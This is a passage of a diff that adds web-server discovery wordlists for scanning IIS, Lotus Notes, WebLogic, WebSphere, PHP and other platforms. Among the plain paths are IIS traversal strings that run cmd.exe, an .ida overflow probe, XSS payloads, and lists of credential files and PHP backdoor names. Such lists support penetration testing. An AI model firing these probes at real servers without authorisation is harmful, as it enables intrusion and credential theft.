+/iissamples/sdk/asp/docs/codebrws.asp
+/iissamples/sdk/asp/docs/CodeBrws.asp
+/imprimer.asp
+/includes/adovbs.inc
+/index.php
+/index.shtml
+/isapi/
+/_layouts/alllibs.htm
+/_layouts/settings.htm
+/_layouts/userinfo.htm
+# Look at the result codes in the headers - 403 likely mean the dir exists, 404  means not. It takes an ISAPI filter for IIS to return 404's for 403s. 
+/Mail/smtp/Admin/smadv.asp
+/market
+/_mem_bin/
+/_mem_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+/_mem_bin/autoconfig.asp
+/_mem_bin/formslogin.asp
+/Micros~1/
+/Microsoft-Server-ActiveSync/
+/msadc/
+/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+/msadc/Samples/selector/showcode.asp
+/msdac/root.exe?/c+dir
+/mspress30
+/%NETHOOD%/
+/null.htw
+/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHilite
+/OMA/
+/OWA/
+/pbserver/pbserver.dll
+/postinfo.html
+/.printer
+/_private
+/progra~1
+/Progra~1
+/Public/
+/publisher
+/qwertypoiu.htw
+/qwertypoiu.printer
+/rubrique.asp
+/samples/
+/~/<script>alert('XSS')</script>.asp
+/~/<script>alert('XSS')</script>.aspx
+/<script>alert('XSS')</script>.aspx
+/scripts/
+/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+/scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\\
+/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\
+/scripts/cgimail.exe
+/scripts/convert.bas
+/scripts/counter.exe
+/scripts/fpcount.exe
+/scripts/iisadmin/ism.dll?http/dir
+/scripts/no-such-file.pl
+/scripts/root.exe?/c+dir
+/scripts/samples/search/webhits.exe
+/scripts/tools/getdrvs.exe
+/scripts/tools/newdsn.exe
+/search?NS-query-pat=..\..\..\..\..\boot.ini
+/share/
+/SiteServer/Admin
+/SiteServer/Admin/commerce/foundation/driver.asp
+/SiteServer/Admin/commerce/foundation/DSN.asp
+/SiteServer/admin/findvserver.asp
+/SiteServer/Admin/knowledge/dsmgr/default.asp
+/siteserver/publishing/viewcode.asp
+/SiteServer/Publishing/viewcode.asp
+/Sites/Knowledge/Membership/Inspiredtutorial/Viewcode.asp
+/Sites/Knowledge/Membership/Inspired/ViewCode.asp
+/Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
+/Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
+/Sites/Samples/Knowledge/Push/ViewCode.asp
+/Sites/Samples/Knowledge/Search/ViewCode.asp
+/test/
+/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=goatfart+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2goatfart.html&newdb=CREA
+/tsweb/
+/vc30
+/_fpclass/
+/_vti_adm/
+/_vti_aut/
+/_vti_bin/
+/_vti_bin/
+/_vti_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+/_vti_bin/fpcount.exe?Page=default.asp|Image=3
+/_vti_bin/shtml.dll
+/_vti_bin/shtml.dll/asdfghjkl
+/_vti_bin/shtml.exe/qwertyuiop
+/_vti_bin/_vti_aut/dvwssr.dll
+/_vti_bin/_vti_aut/fp30reg.dll
+/_vti_bin/_vti_aut/fp30reg.dll?1234=X
+/_vti_cnf/
+/_vti_log/
+/_vti_pvt/
+/_vti_pvt/
+/_vti_pvt/administrator.pwd
+/_vti_pvt/administrators.pwd
+/_vti_pvt/authors.pwd
+/_vti_pvt/service.pwd
+/_vti_pvt/shtml.exe
+/_vti_pvt/users.pwd
+/_vti_script
+/_vti_txt
+/_WEB_INF/
+/WEB-INF/web.xml
+/WebSer~1
+/x.cfm
+/x.htw
+/x.htx
+/x.ida
+/x.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=X
+/x.idc
+/x.idq
+/x.pl
+/x.shtml

Discovery/JBoss.fuzz.txt

@@ -0,0 +1,4 @@
+/jmx-console
+/web-console
+/web-console/Invoker
+/invoker/JMXInvokerServlet

Discovery/JRun.fuzz.txt

@@ -0,0 +1,13 @@
+/compass/logon.jsp
+/databasenotes.html
+/flash/java/javabean/FlashJavaBean.html
+/jrunscripts
+/jstl-war/index.html
+/SmarTicketApp/index.html
+/techniques/servlets/index.html
+/travelnet/home.jsp
+/WEB-INF/webapp.properties
+/WEB-INF/web.xml
+/worldmusic/action/catalog
+/worldmusic/action/cdlist
+/ws-client/loanCalculation.jsp

Discovery/JavaServlets_Common.fuzz.txt

@@ -0,0 +1,3 @@
+/DWREasyAjax/dwr/index.html
+/dwr/index.html
+/dwr/engine.js

Discovery/Logins.fuzz.txt

@@ -0,0 +1,46 @@
+/admin.asp
+/admin.aspx
+/admin.cfm
+/admin.jsp
+/admin.php
+/admin.php4
+/admin.pl
+/admin.py
+/admin.rb
+/administrator
+/administrator.asp
+/administrator.aspx
+/administrator.cfm
+/administrator.jsp
+/administrator.php
+/administrator.php4
+/administrator.pl
+/administrator.py
+/administrator.rb
+/admnistrator.php3
+/cgi-bin/sqwebmail?noframes=1
+/default.asp
+/exchange/logon.asp
+/gs/admin
+/index.php?u=
+/login.asp
+/login.aspx
+/login.cfm
+/login.php
+/login.php3
+/login.php4
+/login.pl
+/login.py
+/login.rb
+/logon.asp
+/logon.aspx
+/logon.jsp
+/logon.php
+/logon.php3
+/logon.php4
+/logon.pl
+/logon.py
+/logon.rb
+/typo3/in
+/utilities/TreeView.asp
+/webeditor.php

Discovery/LotusNotes.fuzz.txt

@@ -0,0 +1,206 @@
+/account.nsf
+/accounts.nsf
+/activity.nsf
+/adm-bin/acls.exe
+/adm-bin/alerts.exe
+/adm-bin/console.exe
+/adm-bin/listdb.exe
+/adm-bin/webstats.exe
+/admin4.nsf
+/admin5.nsf
+/adminadm0disk.nsf
+/adminadm0plog.nsf
+/admin.nsf
+/a_domlog.nsf
+/agentrunner.nsf
+/AgentRunner.nsf
+/alog4.nsf
+/alog.nsf
+/archive/a_domlog.nsf
+/archive/l_domlog.nsf
+/billing.nsf
+/bookmark.nsf
+/bookmarks.nsf
+/books.nsf
+/busytime.nsf
+/calendar.nsf
+/catalog.nsf
+/cersvr.nsf
+/certa.nsf
+/certlog.nsf
+/certsrv.nsf
+/chatlog.nsf
+/clbusy.nsf
+/cldbdir.nsf
+/clusta4.nsf
+/collect4.nsf
+/cpa.nsf
+/customerdata
+/da.nsf
+/database.nsf
+/dba4.nsf
+/dbdirman.nsf
+/db.nsf
+/dclf.nsf
+/DEASAppDesign.nsf
+/DEASLog01.nsf
+/DEASLog02.nsf
+/DEASLog03.nsf
+/DEASLog04.nsf
+/DEASLog05.nsf
+/DEASLog.nsf
+/decsadm.nsf
+/decslog.nsf
+/DEESAdmin.nsf
+/default.nsf
+/deslog.nsf
+/diiop_ior.txt
+/dirassist.nsf
+/doc/dspug.nsf
+/doc/helpadmn.nsf
+/doc/javapg.nsf
+/doc/readmec.nsf
+/doladmin.nsf
+/domadmin.nsf
+/domcfg.nsf
+/domguide.nsf
+/domlog.nsf
+/dspug.nsf
+/event.nsf
+/events4.nsf
+/events5.nsf
+/events.nsf
+/group.nsf
+/groups.nsf
+/help4.nsf
+/help/decsdoc6.nsf
+/help/decsdoc.nsf
+/help/dols_help.nsf
+/help/help5_admin.nsf
+/help/help5_client.nsf
+/help/help5_designer.nsf
+/help/help65_admin.nsf
+/help/help65_client.nsf
+/help/help65_designer.nsf
+/help/lccon6.nsf
+/help/lccon.nsf
+/help/lsxlc6.nsf
+/help/lsxlc.nsf
+/helplt4.nsf
+/help/readme.nsf
+/hidden.nsf
+/homepage.nsf
+/iNotes/Forms5.nsf
+/iNotesForms5.nsf
+/iNotes/Forms5.nsf/$DefaultNav
+/iNotes/Forms6.nsf
+/iNotes/help65_iwa_en.nsf
+/jotter.nsf
+/lccon.nsf
+/ldap.nsf
+/l_domlog.nsf
+/leiadm.nsf
+/leilog.nsf
+/leivlt.nsf
+/lndfr.nsf
+/log4a.nsf
+/loga4.nsf
+/log.nsf
+/lsxlc.nsf
+/mab.nsf
+/mail10.box
+/mail1.box
+/mail2.box
+/mail3.box
+/mail4.box
+/mail5.box
+/mail6.box
+/mail7.box
+/mail8.box
+/mail9.box
+/mail/admin.nsf
+/mail.box
+/mail/NOMBRE_USUARIO.nsf
+/mail/pxp.nsf
+/mailw46.nsf
+/msdwda.nsf
+/mtatbls.nsf
+/mtstore.nsf
+/names.nsf
+/nntp/nd000000.nsf
+/nntp/nd000001.nsf
+/nntp/nd000002.nsf
+/nntp/nd000003.nsf
+/nntp/nd000004.nsf
+/nntppost.nsf
+/notes.nsf
+/ntsync45.nsf
+/ntsync4.nsf
+/?Open
+/?OpenServer
+/patrol41.nsf
+/perweb.nsf
+/private.nsf
+/proghelp/KBCCV11.NSF
+/proghelp/KBNV11.NSF
+/proghelp/KBSSV11.NSF
+/public.nsf
+/puserinfo.nsf
+/qpadmin.nsf
+/qstart.nsf
+/quickplace/quickplace/main.nsf
+/quickplacequickplacemain.nsf
+/quickstart/qstart50.nsf
+/quickstart/wwsample.nsf
+/readme.nsf
+/reports.nsf
+/resource.nsf
+/sample/faqw46.nsf
+/sample/framew46.nsf
+/sample/pagesw46.nsf
+/sample/siregw46.nsf
+/sample/site1w46.nsf
+/sample/site2w46.nsf
+/sample/site3w46.nsf
+/schema50.nsf
+/schema.nsf
+/secret.nsf
+/setup.nsf
+/setupweb.nsf
+/smbcfg.nsf
+/smconf.nsf
+/smency.nsf
+/smhelp.nsf
+/smmsg.nsf
+/smquar.nsf
+/smsolar.nsf
+/smtime.nsf
+/smtp.box
+/smtpibwq.nsf
+/smtp.nsf
+/smtpobwq.nsf
+/smtptbls.nsf
+/smvlog.nsf
+/software.nsf
+/srvnam.htm
+/srvnam.nsf
+/statauths.nsf
+/statautht.nsf
+/statmail.nsf
+/statrep.nsf
+/stauths.nsf
+/stautht.nsf
+/stconfig.nsf
+/stconf.nsf
+/stdnaset.nsf
+/stdomino.nsf
+/stlog.nsf
+/streg.nsf
+/stsrc.nsf
+/test.nsf
+/userreg.nsf
+/users.nsf
+/vpuserinfo.nsf
+/webadmin.nsf
+/web.nsf
+/welcome.nsf

Discovery/Netware.fuzz.txt

@@ -0,0 +1,18 @@
+/ICHAINErrors
+/ICSLogin
+/ICHAINLogout
+/ICSIBroker
+/NetStorage
+/iManager
+/eMFrame
+/oneNet
+/ICHAIN
+/ICS
+/NSearch
+/SearchServlet
+/site
+/home.html
+/iFolder
+/update
+/webacc
+/nps

Discovery/Oracle9i.fuzz.txt

@@ -0,0 +1,60 @@
+/CookieExample
+/Counter
+/DateServlet
+/HelloWorldServlet
+/RequestParamExample
+/SessionExample
+/SessionServlet
+/SimpleServlet
+/SnoopServlet
+/basic
+/cal
+/cgi-bin
+/echo
+/examples
+/fcgi-bin
+/hellouser
+/hellouser.jsp
+/j2ee
+/jsp
+/login.html
+/ojspdemos
+/perl
+/printenv
+/servlet
+/simple
+/snoop.jsp
+/snp
+/usebean.jsp
+/welcomeuser.jsp
+/pls
+/SIMPLEDAD
+/HTMLDB
+/ORASSO
+/SSODAD
+/PORTAL
+/PORTAL2
+/PORTAL30
+/PORTAL30_SSO
+/TEST
+/DAD
+/APP
+/ONLINE
+/DB
+/OWA
+/simpledad
+/htmldb
+/orasso
+/ssodad
+/portal
+/portal2
+/portal30
+/portal30_sso
+/test
+/dad
+/app
+/online
+/db
+/owa
+/null
+/pls/dad/null

Discovery/OracleAppServer.fuzz.txt

@@ -0,0 +1,163 @@
+/*.jsp
+/Adaptador
+/Admin
+/AggreSpy
+/Apps
+/BBoardServlet
+/BPELConsole
+/ConfigServlet
+/CookieExample
+/Counter
+/DateServlet
+/EJB
+/EMDServlet
+/FE
+/HelloWorldServlet
+/HelloworldExample
+/HelloworldServlet
+/HttpSoap12
+/JMSRouter_MBean_starter
+/JMXSoapAdapter
+/JMXSoapAdapter-web
+/JSP
+/OHW
+/Oracle
+/OracleASjms
+/RedirectServlet
+/RequestHeaderExample
+/RequestInfoExample
+/RequestParamExample
+/Servlet
+/ServletToJsp
+/Servlets
+/SessionExample
+/SessionServlet
+/SimpleServlet
+/SnoopServlet
+/Spy
+/ToJSPServlet
+/ViewSrc
+/_pages
+/admin_ejb
+/aqserv/servlet
+/ascontrol
+/basic
+/bc4j
+/bc4j.jsp
+/bpel
+/cabo
+/cal
+/catalog
+/ccore
+/cgi-bin
+/console
+/console
+/console/*
+/console/help/*
+/dav_public
+/default
+/defaultWebApp
+/dms
+/dms/AggreSpy
+/dms/Spy
+/dms0
+/dms0/AggreSpy
+/dms0/Spy
+/dmsoc4j
+/dmsoc4j/AggreSpy
+/dynamicImage
+/dynamicImage
+/dynamicImage/*
+/echo
+/echo2
+/em
+/esb
+/esb/
+/examples
+/examples/jsp/jsp2/misc/config.jsp
+/examples/jsp/snp/snoop.jsp
+/false
+/fcgi-bin
+/fcgi-bin/echo
+/fcgi-bin/echo.exe
+/fcgi-bin/echo2
+/fcgi-bin/echo2.exe
+/hellouser
+/hellouser.jsp
+/home
+/home/oas/OraHome_1/
+/ias/cluster/appServer.jsp
+/ias/cluster/topology.jsp
+/ias/faintTabsInclude.jsp
+/ias/oc4j/admin/j2eeWebsites.jsp
+/ias/oc4j/admin/websites/wsHome.jsp
+/ias/oc4j/administration.jsp
+/ias/oc4j/app/appHome.jsp
+/ias/oc4j/app/appViewDesc.jsp
+/index.html
+/index.jsp
+/index_jsp
+/index_jsp
+/j2ee
+/javacachedocs
+/jmsrouter
+/jmsrouter_ejb
+/jmsrouter_web
+/jsp
+/jspdocs
+/jspsamples
+/login.html
+/logon.jsp
+/netbanking
+/no
+/oas
+/oc4j
+/oc4j-status
+/oc4jadmin
+/oiddas
+/oiddas/ui/oracle/ldap/das
+/ojspdemos
+/oprocmgr-service
+/oracle
+/perl
+/petstore
+/portlist
+/printenv
+/ruleauthor
+/servlet
+/servlet/BBoardServlet
+/servlet/ConfigServlet
+/servlet/CookieExample
+/servlet/Counter
+/servlet/DateServlet
+/servlet/HelloWorldExample
+/servlet/HelloWorldServlet
+/servlet/RedirectServlet
+/servlet/RequestHeaderExample
+/servlet/RequestInfoExample
+/servlet/RequestParamExample
+/servlet/SessionExample
+/servlet/SessionServlet
+/servlet/SimpleServlet
+/servlet/SnoopServlet
+/servlet/ToJSPServlet
+/servlet/ViewSrc
+/servlet/ViewSrc/*
+/servlet/servletToJsp
+/shutdown
+/simple
+/snoop.jsp
+/snp
+/stressH
+/system
+/testru
+/testunit
+/transtrace
+/true
+/uixi
+/usebean.jsp
+/utility
+/webapp
+/webapp/wm/bc4j.jsp
+/welcomeuser.jsp
+/wm

Discovery/PHP.fuzz.txt

@@ -0,0 +1,24 @@
+/phpinfo.php
+/test.php
+/test1.php
+/test2.php
+/_index.php
+/__index.php
+/index.php~
+/index.php-bak
+/index-bak
+/index.php.bak
+/info.php
+/phpsecinfo
+/php.ini
+/php.ini~
+/php
+/phpsecinfo
+/phpinfo
+/phpmyadmin/
+/phpMyAdmin/
+/mysqladmin/
+/MySQLadmin
+/MySQLAdmin
+/login.php
+/logon.php

Discovery/PHP_CommonBackdoors.fuzz.txt

@@ -0,0 +1,5 @@
+c99.php
+c99shell.php
+r57.php
+r58.php
+dra.php

Discovery/Passwords.fuzz.txt

@@ -0,0 +1,47 @@
+/secring.skr
+/secring.pgp
+/secring.bak
+/passwd
+/passwd.bak
+/master.passwd
+/pwd.db
+/htpasswd
+/htpasswd.bak
+/htgroup
+/spwd.db
+/htpasswd/htpasswd.bak
+/config.php
+/phpinfo.php
+/passlist
+/passlist.txt
+/auth_user_file
+/administrators.pwd
+/admin.mdb
+/connect.inc
+/globals.inc
+/vtund.conf
+/password.log
+/slapd.conf
+/wvdial.conf
+/.netrc
+/wand.dat
+/mrtg.cfg
+/zebra.conf
+/ospfd.conf
+/ccbill.log
+/users.mdb
+/lilo.conf
+/wwwboard/passwd.txt
+/db/main.mdb
+/sites.ini
+/wcx_ftp.ini
+/ws_ftp.ini
+/flashFXP.ini
+/serv-u.ini
+/eudora.ini
+/unattend.txt
+/passwd.txt
+/server.cfg
+/pass.dat
+/phpinfo.php
+/admin.dat

Discovery/Randomfiles.fuzz.txt

@@ -0,0 +1,24 @@
+/accounts.txt
+/culeadora.txt
+/data.txt
+/database.txt
+/grabbed.html
+/info.txt
+/l0gs.txt
+/log.txt
+/logins.txt
+/logs.txt
+/members.txt
+/pass.txt
+/passes.txt
+/password.html
+/password.txt
+/passwords.html
+/passwords.txt
+/pazz.txt
+/pazzezs.txt
+/pw.txt
+/pws.txt
+/technico.txt
+/usernames.txt
+/users.txt

Discovery/SAP.fuzz.txt

@@ -0,0 +1,6 @@
+/sap/bc/gui/sap/its/webgui
+/sap/public/icman/ping
+/sap/admin
+/sap/public/info
+/sap/wdisp/admin
+/scripts/wgate

Discovery/SiteMinder.fuzz.txt

@@ -0,0 +1,19 @@
+/iam/
+/iam/siteminder/
+/sitemindermonitor/
+/sitemindermonitor/doConfig.jsp
+/sitemindermonitor/doSave.jsp
+/sitemindermonitor/readfile.jsp
+/siteminder/
+/siteminder/monitor/
+/siteminder/monitor/settings
+/doConfig.jsp
+/doSave.jsp
+/readfile.jsp
+/siteminderagent/
+/siteminderagent/pwcgi/
+/siteminderagent/pwcgi/smpwservicescgi.exe
+/auth/
+/servlet/
+/servlet/DateServlet
+/servlet/TestServlet

Discovery/SunAppServerGlassfish.fuzz.txt

@@ -0,0 +1,51 @@
+/BasicAuthServlet
+/CertAuthServlet
+/cgi-bin
+/cgi-bin/gx.cgi
+/cgi-bin/gx.dll
+/cgi-bin/gx.exe
+/classes
+/com.netscape.server.servlet.jsp.JSPRunner
+/COnlineBank
+/CSample
+/ExceptionThrown.jsp
+/FormAuthServlet
+/fortune
+/gx
+/GXApp
+/GXApp/COnlineBank
+/GXApp/COnlineBank/COBLogin.html
+/GXApp/CSample
+/GXApp/CSample/index.html
+/GXApp/images
+/GXApp/index.html
+/GXApp/OnlineBank
+/GXApp/OnlineBank/OBLogin.html
+/gx.cgi
+/gx.exe
+/ias-samples
+/ias-samples/index.html
+/index.html
+/JSPRunner
+/JSPRunnerSticky
+/lotery
+/NASApp
+/NASApp/fortune/fortune
+/NASApp/system
+/NASApp/system/BasicAuthServlet
+/NASApp/system/CertAuthServlet
+/NASApp/system/ExceptionThrown.jsp
+/NASApp/system/FormAuthServlet
+/NASApp/system/JSPRunner
+/NASApp/system/JSPRunnerSticky
+/NASApp/system/SessionInvalidator
+/NASApp/system/StaticServlet
+/NASApp/system/ValidationError.jsp
+/NASApp/system/WelcomeListServlet
+/OnlineBank
+/servlet
+/SessionInvalidator
+/StaticServlet
+/system
+/ValidationError.jsp
+/WelcomeListServlet

Discovery/SuniPlanet.fuzz.txt

@@ -0,0 +1,36 @@
+/admin-serv
+/admin-serv/config/admpw
+/admpw
+/agents
+/bin
+/ca
+/ca
+/cgi-bin
+/config
+/dirb_random.cgi
+/dirb_random.jsp
+/dirb_random.shtml
+/docs
+/dsgw
+/help
+/index.html
+/jsp
+/manual
+/mc-icons
+/netshare
+/ns-icons
+/publisher
+/?Publisher
+/search
+/search-ui
+/servlet
+/servlets
+/?wp-cs-dump
+/?wp-html-rend
+/?wp-start-ver
+/?wp-stop-ver
+/?wp-uncheckout
+/?wp-usr-prop
+/?wp-ver-diff
+/?wp-verify-link
+/?wp-ver-info

Discovery/UnixDotfiles.fuzz.txt

@@ -0,0 +1,51 @@
+/.DS_Store
+/.FBCIndex
+/.access
+/.addressbook
+/.bash_history
+/.bashrc
+/.cobalt
+/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>
+/.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>
+/.cobalt/sysManage/../admin/.htaccess
+/.fhp
+/.forward
+/.history
+/.htaccess
+/.htaccess.old
+/.htaccess.save
+/.htaccess~
+/.htpasswd
+/.lynx_cookies
+/.mysql_history
+/.nsconfig
+/.nsf/../winnt/win.ini
+/.passwd
+/.perf
+/.pinerc
+/.plan
+/.proclog
+/.procmailrc
+/.profile
+/.psql_history
+/.rhosts
+/.sh_history
+/.ssh
+/.ssh/authorized_keys
+/.ssh/known_hosts
+/.www_acl
+/.wwwacl
+/.access
+/.cobalt
+/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('XSS')>
+/.cobalt/alert/service.cgi?service=<script>alert('XSS')</script>
+/.fhp
+/.htaccess
+/.htaccess.old
+/.htaccess.save
+/.htaccess~
+/.htpasswd
+/.nsconfig
+/.passwd
+/.www_acl
+/.wwwacl

Discovery/Vignette.fuzz.txt

@@ -0,0 +1,73 @@
+/0,,,00
+/0,,,00.html
+/1,,,00
+/1,,,00.html
+/CDA
+/CDS
+/CMA
+/CMS
+/Deleting
+/Docs
+/Editing
+/HOME
+/Images
+/Internal
+/MetaDataUpdate
+/Report
+/Select
+/StoryServer
+/TMT
+/VGN
+/XML
+/ac
+/allvars
+/asp
+/aspstatus
+/cda
+/cds
+/cma
+/cms
+/controller
+/diag
+/docs
+/edit
+/error
+/errorpage
+/errors
+/executequery
+/external
+/home
+/ibm
+/initialize
+/internal
+/jsp
+/jspstatus
+/jsptest
+/legacy
+/license
+/listcolumns
+/login
+/loginlogo
+/logo
+/main
+/menu
+/metadataupdate
+/performance
+/portal
+/ppstats
+/preview
+/previewer
+/record
+/reset
+/save
+/stat
+/status
+/storyserver
+/style
+/stylepreviewer
+/utils
+/vdc
+/vgn
+/vr
+/Ping.jsp
+/HelloWorld.jsp

Discovery/Weblogic.fuzz.txt

@@ -0,0 +1,160 @@
+/*.gif
+/*.gif/
+/*.html
+/*.jsp
+/*.jsp/
+/*.jws
+/*.shtml/
+/AdminCaptureRootCA
+/AdminClients
+/AdminConnections
+/AdminEvents
+/AdminJDBC
+/AdminLicense
+/AdminMain
+/AdminProps
+/AdminRealm
+/AdminThreads
+/AdminVersion
+/BizTalkServer
+/Bootstrap
+/Certificate
+/Classpath/
+/ConsoleHelp/
+/ConsoleHelp
+/DefaultWebApp
+/HTTPClntClose
+/HTTPClntLogin
+/HTTPClntRecv
+/HTTPClntSend
+/LogfileSearch
+/LogfileTail
+/Login.jsp
+/MANIFEST.MF
+/META-INF
+/SimpappServlet
+/StockServlet
+/T3AdminMain
+/UniversityServlet
+/WEB-INF
+/WEB-INF./web.xml
+/WEB-INF/web.xml
+/WLDummyInitJVMIDs
+/WebServiceServlet
+/_tmp_war
+/_tmp_war_DefaultWebApp
+/a2e2gp2r2/x.jsp
+/actions
+/admin/login.do
+/applet
+/applications
+/authenticatedy
+/bea_wls_internal/classes/
+/bea_wls_internal/classes/
+/bea_wls_internal/WebServiceServlet
+/bea_wls_internal/getior
+/bea_wls_internal
+/bea_wls_internal/HTTPClntSend
+/bea_wls_internal/HTTPClntRecv
+/bea_wls_internal/iiop/ClientSend
+/bea_wls_internal/iiop/ClientRecv
+/bea_wls_internal/iiop/ClientLogin
+/bea_wls_internal/WLDummyInitJVMIDs
+/bea_wls_internal/a2e2gp2r2/x.jsp
+/bea_wls_internal/psquare/x.jsp
+/bea_wls_internal/iiop/ClientClose
+/beanManaged
+/certificate
+/classes
+/classes/
+/com
+/common
+/config
+/console
+/cookies
+/default
+/docs51
+/domain
+/drp-exports
+/drp-publish
+/dummy
+/e2ePortalProject/Login.portal
+/ejb
+/ejbSimpappServlet
+/error
+/examplesWebApp/EJBeanManagedClient.jsp
+/examplesWebApp/WebservicesEJB.jsp
+/examplesWebApp/OrderParser.jsp?xmlfile=C:/bea/weblogic81/samples/server/examples/src/examples/xml/orderParser/order.xml
+/examplesWebApp/index.jsp
+/examplesWebApp/InteractiveQuery.jsp
+/examplesWebApp/SessionServlet
+/fault
+/file
+/file/
+/fileRealm
+/fileRealm.properties
+/getior
+/graphics
+/helloKona
+/helloWorld
+/iiop/ClientClose
+/iiop/ClientRecv
+/iiop/ClientLogin
+/iiop/ClientSend
+/images
+/index
+/index.jsp
+/internal
+/jmssender
+/jmstrader
+/jspbuild
+/jwsdir
+/login.jsp
+/manifest.mf
+/mapping
+/mydomain
+/myservlet
+/page
+/patient/login.do
+/patient/register.do
+/phone
+/physican/login.do
+/portalAppAdmin/login.jsp
+/properties
+/proxy
+/psquare/x.jsp
+/public_html
+/servlet
+/servletimages
+/servlets/
+/session
+/simpapp
+/simple
+/simpleFormServlet
+/snoop
+/survey
+/system
+/taglib-uri
+/uddi
+/uddi/uddilistener
+/uddiexplorer
+/uddilistener
+/utils
+/web
+/web.xml
+/weblogic
+/weblogic.properties
+/weblogic.xml
+/webservice
+/webshare
+/wl_management_internal2/FileDistribution
+/wl_management_internal2/Bootstrap
+/wl_management_internal2/Admin
+/wl_management_internal2/wl_management
+/wl_management_internal1/LogfileTail
+/wl_management_internal1/LogfileSearch
+/wl_management_internal1
+/wl_management
+/wl_management_internal2
+/wliconsole
+/wlserver

Discovery/Websphere.fuzz.txt

@@ -0,0 +1,366 @@
+/*
+/*.do
+/*.jsp
+/*.jsv
+/*.jsw
+/AddressBookJ2WB
+/AddressBookJ2WB/*
+/AddressBookJ2WE/*.jsp
+/AddressBookJ2WE/*.jsv
+/AddressBookJ2WE/*.jsw
+/AddressBookJ2WE/services/AddressBook
+/AddressBookJ2WE/services/AddressBook/wsdl/*
+/AddressBookW2JB
+/AddressBookW2JB/*
+/AddressBookW2JE/*.jsp
+/AddressBookW2JE/*.jsv
+/AddressBookW2JE/*.jsw
+/AddressBookW2JE/services/AddressBook
+/AddressBookW2JE/services/AddressBook/wsdl/*
+/AlbumCatalogWeb
+/AlbumCatalogWeb/*
+/AlbumCatalogWeb/docs/*
+/AlbumCatalogWeb/docsservlet
+/AlbumCatalogWeb/docsservlet/*
+/AlbumCatalogWebservlet
+/AlbumCatalogWebservlet/*
+/AppInstallStatusServlet
+/AppManagementStatus
+/AppServer
+/ApplicationProfileSample
+/ApplicationProfileSample/*
+/ApplicationProfileSample/docs/*
+/ApplicationProfileSampleservlet
+/ApplicationProfileSampleservlet/*
+/BBApp
+/Bank/*.jsp
+/Bank/*.jsv
+/Bank/*.jsw
+/Bank/services/Transfer_SEI
+/Bank/services/Transfer_SEI/wsdl
+/Bank/services/Transfer_SEI/wsdl/*
+/BeenThere
+/ClusterRollout
+/ControllerServlet
+/DynaCacheESI
+/DynaCacheESI/esiInavlidator
+/DynamicQuery/EmployeeFinder
+/DynamicQuery/EmployeeFinder/*
+/DynamicQuery/docs/*
+/ErrorReporter
+/ErrorServlet
+/FileTransfer
+/GalleryMenu
+/Greenhouse
+/Greenhouse/*
+/GreenhouseByWebSphere/docs/*
+/GreenhouseEJB/*.jsp
+/GreenhouseEJB/*.jsv
+/GreenhouseEJB/*.jsw
+/GreenhouseEJB/services/GreenhouseFront
+/GreenhouseEJB/services/GreenhouseFront/wsdl/*
+/GreenhouseWeb
+/GreenhouseWeb/*
+/GreenhouseWebservlet
+/GreenhouseWebservlet/*
+/Greenhouseservlet
+/Greenhouseservlet/*
+/HelloHTML.jsp
+/HelloHTMLError.jsp
+/HelloPervasive
+/HelloVXML.jsp
+/HelloVXMLError.jsp
+/HelloWML.jsp
+/HelloWMLError.jsp
+/HelloWorld
+/HelloWorldServlet
+/HitCount
+/HitCount.jsp
+/IBMDefaultErrorReporter
+/IBMWebAS
+/JTAExtensionsSamples/TransactionTracker
+/JTAExtensionsSamples/TransactionTracker/*
+/JTAExtensionsSamples/docs/*
+/MANIFEST.MF
+/META-INF
+/MessageDrivenBeans/docs/*
+/MessageDrivenBeans/docsservlet/*
+/OrderProcessorEJB/*
+/OrderProcessorEJB/*.jsp
+/OrderProcessorEJB/*.jsv
+/OrderProcessorEJB/*.jsw
+/OrderProcessorEJB/services/FrontGate
+/OrderProcessorEJB/services/FrontGate/wsdl/*
+/PlantsByWebSphere
+/PlantsByWebSphere/*
+/PlantsByWebSphere/docs
+/SamplesGallery
+/SamplesGallery/*
+/SimpleServlet
+/SnoopServlet
+/SourceCodeViewer
+/Sourceservlet-classViewer
+/StockQuote/*.jsp
+/StockQuote/*.jsv
+/StockQuote/*.jsw
+/StockQuote/services/xmltoday-delayed-quotes
+/StockQuote/services/xmltoday-delayed-quotes/wsdl/*
+/TechnologySamples/AddressBook
+/TechnologySamples/AddressBook/*
+/TechnologySamples/AddressBook/*.jsp
+/TechnologySamples/AddressBook/*.jsv
+/TechnologySamples/AddressBook/*.jsw
+/TechnologySamples/AddressBook/AddressBookServlet
+/TechnologySamples/AddressBook/servlet/*
+/TechnologySamples/BasicCalculator
+/TechnologySamples/BasicCalculator/*
+/TechnologySamples/BulletinBoard
+/TechnologySamples/BulletinBoard/*
+/TechnologySamples/BulletinBoardservlet
+/TechnologySamples/BulletinBoardservlet/*
+/TechnologySamples/Calendar
+/TechnologySamples/Calendar/*
+/TechnologySamples/FilterServlet
+/TechnologySamples/FilterServlet/*
+/TechnologySamples/FormLogin
+/TechnologySamples/FormLogin/*
+/TechnologySamples/FormLoginservlet
+/TechnologySamples/FormLoginservlet/*
+/TechnologySamples/JAASLogin
+/TechnologySamples/JAASLogin/*
+/TechnologySamples/JAASLoginservlet
+/TechnologySamples/JAASLoginservlet/*
+/TechnologySamples/MovieReview
+/TechnologySamples/MovieReview/*
